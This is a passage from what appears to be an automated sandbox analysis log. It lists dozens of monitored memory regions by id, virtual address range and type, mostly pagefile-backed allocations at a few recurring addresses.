0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4634 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4635 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4636 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4637 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4638 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4639 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4640 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4641 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4642 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4643 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4644 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4645 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4646 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4647 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4648 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4649 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4650 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4651 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4652 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4653 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4654 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4655 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4656 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4657 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4658 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4659 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4660 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4661 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4662 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4663 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4664 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4665 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4666 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4667 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4668 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4669 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4670 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4671 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4672 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4673 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4674 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4675 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4676 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4677 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4678 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4679 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4680 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4681 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4682 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4683 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4684 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4685 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4686 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4687 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4688 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4689 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4690 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4691 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4692 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4693 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4694 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4695 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4696 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4697 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4698 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4699 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4700 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4701 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4702 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4703 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4704 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4705 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4706 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4707 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4708 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4709 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4710 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4711 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4712 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4713 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4714 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4715 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4716 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4717 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4718 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4719 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4720 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4721 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4722 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4723 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4724 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4725 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4726 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4727 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4728 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4729 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4730 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4731 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4732 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4733 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4734 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4735 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4736 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4737 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4738 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4739 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4740 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4741 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4742 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4743 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4744 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4745 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4746 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4747 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4748 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4749 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4750 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4751 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4752 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4753 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4754 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4755 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4756 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4757 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4758 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4759 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4760 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4761 start_va = 0x64e0000 end_va = 0x64f6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4762 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4763 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4764 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4765 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4766 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4767 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4768 start_va = 0x64e0000 end_va = 0x64f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4769 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4770 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4771 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4772 start_va = 0x64e0000 end_va = 0x64effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 4773 start_va = 0x64e0000 end_va = 0x64fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 4774 start_va = 0x6500000 end_va = 0x650dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006500000" filename = "" Region: id = 4775 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4776 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4777 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4778 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4779 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4780 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4781 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4782 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4783 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4784 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4785 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4786 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4787 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4788 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4789 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4790 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4791 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4792 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4793 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4794 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4795 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4796 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4797 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4798 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4799 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4800 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4801 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4802 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4803 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4804 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4805 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4806 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4807 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4808 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4809 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4810 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4811 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4812 start_va = 